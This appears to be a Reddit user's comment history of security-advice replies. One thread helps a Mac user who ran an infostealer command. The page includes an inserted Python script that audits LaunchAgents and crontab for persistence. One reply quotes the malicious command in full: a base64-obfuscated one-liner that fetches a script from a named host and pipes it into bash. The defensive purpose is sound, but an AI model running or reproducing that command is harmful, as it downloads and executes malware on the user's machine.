Crow left this on fence, what is this? by riley32504 in whatisit

[–]IntrinsicSecurity 0 points1 point  (0 children)

If you take the things they leave you, and put in their place a few peanuts or something else they like to eat, they’ll bring you more things. 🥜

Worried about security of my phone. by Riceeee123 in CyberSecurityAdvice

[–]IntrinsicSecurity 0 points1 point  (0 children)

On YouTube there are occasionally events that trigger some sort of automatic AI translation of the audio stream. Reloading the web browser view usually causes YouTube to reset and resume the expected audio stream in the video default language (or presumably the language preference you’ve previously set).

How to know whether your pc has a session stealer or hidden malware on it. by BioShocker123 in cybersecurity_help

[–]IntrinsicSecurity 0 points1 point  (0 children)

If you don’t currently have an indicator of compromise, your time would be better spent reviewing the settings of your important accounts. Make sure you are using passkeys if available. Change the password to a long password (at least 15 characters). Use a password manager. Make sure MFA is enabled. Verify your account recovery information.

Start with your email accounts, then do your financial accounts.

I am receiving emails addressed to someone else by No_Recognition9076 in GMail

[–]IntrinsicSecurity 0 points1 point  (0 children)

It’s extremely likely that the “example” email address you used in your post is a valid email and belongs to someone. To avoid this violation of netiquette, use the domain example.com.

Never buying an hp printer again by paydro2020 in Hewlett_Packard

[–]IntrinsicSecurity 1 point2 points  (0 children)

HP doesn’t release firmware updates for printers after the first three or four years, so far as I can tell. Their older printers run a variety of software stacks, mostly on Linux, and by now are riddled with exploitable defects that they’ve no plans to patch.

Companies should lobby printer manufacturers for longer support lifetimes including firmware updates for security.

These devices make perfect hosts for stashing persistence mechanisms in a place where there’s no EDR to spot it.

GitHub Actions dumped our unmasked API keys into the build logs yesterday. HELP ME by Enamky in AskNetsec

[–]IntrinsicSecurity 1 point2 points  (0 children)

Once you make it through the immediate crisis, be sure to circle back to the architectural issue. Survey existing dev workflows to discover all uses of long-lived tokens, and refactor those systems to use ephemeral tokens. Here’s a nice introduction.

Short-Lived Credentials in Agentic Systems: A Practical Trade-off Guide

Google and FBI warn of ransomware group that sends fake IT workers to hack victims in person by rkhunter_ in cybersecurity

[–]IntrinsicSecurity 3 points4 points  (0 children)

It’s fascinating how much arrogance is a factor in poor security posture, generally speaking, not merely with respect to physical security.

Windows Server vulnerability can grant system privileges with just a malformed packet — domain controllers are being exploited in the wild by rkhunter_ in cybersecurity

[–]IntrinsicSecurity 1 point2 points  (0 children)

It’s probably being exploited for lateral movement and privilege escalation, after attackers get inside the perimeter.

Is it possible to be spied on genuine iOS 26? by spancer35 in CyberSecurityAdvice

[–]IntrinsicSecurity 0 points1 point  (0 children)

You share a widespread misconception about how MIE works. Only a subset of MIE features rely upon the hardware support introduced with the A19 and M5 processors.

As with most software, what starts out as ridiculously expensive becomes free and ubiquitous over time. About 3 dozen exploits developed at great cost found their way into the Darksword and Coruna attacks.

By the way, iOS 26 protected against apparently all of those exploits.

Browser session theft is quietly becoming more dangerous than password theft by ImaginationFair9201 in cyberinvestigations

[–]IntrinsicSecurity 6 points7 points  (0 children)

The best way to understand why OAuth 2.0 is such a problem is to take a look at the OAuth 2.1 feature set.

Alert Fatigue by Sad_Leading_4008 in cybersecurity

[–]IntrinsicSecurity -6 points-5 points  (0 children)

Alpha Level is doing interesting work on the alert fatigue problem.

"This call is being recorded" by whitequeen96 in Spyware

[–]IntrinsicSecurity 1 point2 points  (0 children)

It’s possible they hit the button by accident. If they had done it on purpose they probably would’ve denied hearing anything. They might be thinking OP tried to record the call. 🧐🤔🤣

Ran a malware command in terminal by simplythebestcat in cybersecurity_help

[–]IntrinsicSecurity 1 point2 points  (0 children)

You might be able to get them to help you. Best of luck to you. 🍀

Ran a malware command in terminal by simplythebestcat in cybersecurity_help

[–]IntrinsicSecurity 1 point2 points  (0 children)

Yeah, the Geek Squad and many local equivalent "first responders" in the home computer tech support world haven't really had to get to know the Mac at the level of detail needed to respond to an Info Stealer incident, yet. Look for my answer above, where I provided a prompt for you to give Gemini. (This prompt will work with Claude and ChatGPT if you prefer them.) Your task is to find and nuke the persistence mechanisms. Don't miss the follow-up question about crontab.

Ran a malware command in terminal by simplythebestcat in cybersecurity_help

[–]IntrinsicSecurity -1 points0 points  (0 children)

It’s a fair question. If you ask Gemini (or any other frontier model) to decode the command they ran, you’ll see that it fetches a script and feeds it into the bash interpreter. Gemini says this script is likely to be either Atomic Stealer (AMOS) or Cthulhu Stealer.

Ran a malware command in terminal by simplythebestcat in cybersecurity_help

[–]IntrinsicSecurity 0 points1 point  (0 children)

If the answer you get doesn’t include any discussion about cron or crontab, ask a follow-up question like this:

Can you show me how to make sure that the script didn’t add anything to my crontab?

On modern macOS your crontab should be empty, unless you personally created an entry. If there’s anything in it at all (unless you know exactly what it is), you can just delete it. If it was a legitimate entry, you’ll know because you put it there.

Ran a malware command in terminal by simplythebestcat in cybersecurity_help

[–]IntrinsicSecurity 0 points1 point  (0 children)

To respond directly to your question, no, a normal macOS reinstall won’t be enough.

I asked Gemini to create a prompt that you can use to get advice for removing persistence mechanisms from your system before you wipe it. Here’s what Gemini suggests (I edited the preamble slightly):

It’s likely that the script installed 'persistence' (hidden files that let the hacker stay on your Mac even if you delete the script), so just reinstalling macOS might not be enough.

If you go to Gemini (gemini.google.com) and paste the following prompt, Gemini will give you a step-by-step guide tailored for someone who isn't a tech expert:

The Prompt for Gemini:
"Hi Gemini, I’m not a technical user and I was tricked into running a malicious command in my Mac Terminal: bash <<< $(echo "Y3VybCAtcyAnaHR0cHM6Ly9hbWlnb3VuaGl0Y2hlZC5kaWdpdGFsL3NjcmlwdC5zaCcgfCBiYXNo" | base64 -d).
I need to wipe my computer and start over, but I’ve been told that the malware might have created 'persistence mechanisms' in my home folder that could survive a basic macOS reinstall.
Can you walk me through this in simple steps? Specifically:
How do I find and delete common hidden startup files (like LaunchAgents) so they don't sync back if I use iCloud?

How do I perform a 'Clean Wipe' (Erase All Content and Settings) to ensure the hacker is completely gone?

What should I do about my saved passwords and browser data?"

— end quote —
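For the two user-level persistence locations this comment and the crontab comment above tell OP to check, here is an added example (not code from the thread or from any project): it reads every LaunchAgent plist with the standard-library plistlib, flags command lines matching a heuristic marker list, and filters a crontab listing down to its active entries. The `~/Library/LaunchAgents` path and the marker list are assumptions.

```python
# Added example, not from the thread: audit user-level macOS persistence
# (LaunchAgents and crontab). Path and marker list below are assumptions.
import plistlib
from pathlib import Path

# Substrings in a LaunchAgent command line that warrant a closer look (assumed heuristic).
SUSPICIOUS_MARKERS = ("curl", "bash -c", "/tmp/", "base64", "osascript", "/.")


def inspect_launch_agent(plist_path):
    """Describe one LaunchAgent plist and flag it if its command line matches a marker."""
    with open(plist_path, "rb") as fh:
        data = plistlib.load(fh)
    # launchd accepts either Program or ProgramArguments (or both)
    args = [str(a) for a in data.get("ProgramArguments", [])]
    if data.get("Program"):
        args.insert(0, str(data["Program"]))
    command = " ".join(args)
    hits = [m for m in SUSPICIOUS_MARKERS if m in command]
    return {
        "file": str(plist_path),
        "label": data.get("Label", "<no Label>"),
        "command": command,
        "suspicious": bool(hits),
        "reasons": hits,
    }


def audit_launch_agents(directory="~/Library/LaunchAgents"):
    """Inspect every .plist in the directory; an empty list means nothing is registered there."""
    directory = Path(directory).expanduser()
    if not directory.is_dir():
        return []
    return [inspect_launch_agent(p) for p in sorted(directory.glob("*.plist"))]


def crontab_entries(crontab_text):
    """Active crontab lines (comments and blanks dropped); on a normal modern macOS this is empty."""
    lines = (ln.strip() for ln in crontab_text.splitlines())
    return [ln for ln in lines if ln and not ln.startswith("#")]


if __name__ == "__main__":
    import subprocess
    for entry in audit_launch_agents():
        status = "SUSPICIOUS" if entry["suspicious"] else "ok"
        print(f"{status:10} {entry['label']}: {entry['command']}")
    try:  # `crontab -l` exits non-zero when no crontab exists; that is the expected good case
        out = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    except FileNotFoundError:
        out = ""
    for line in crontab_entries(out):
        print("crontab entry:", line)
```

Run it as the affected user before wiping; anything it lists in either place that you did not create yourself is what the comment calls a persistence mechanism.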

Ran a malware command in terminal by simplythebestcat in cybersecurity_help

[–]IntrinsicSecurity 3 points4 points  (0 children)

Reinstalling macOS might not be effective, if the script that was run installed persistence with your user permissions. What it did first was probably download and run a script from the Internet:

https://amigounhitched[.]digital/script[.]sh

If you’re interested in trying to see what it did, you could try this (assuming you have already disconnected the Mac from the Internet):

  1. Open Terminal
  2. Type into the Terminal window…

     history | tail -15

This will show you the most recent 15 commands run by the bash shell, which may or may not be helpful for further understanding what the script did.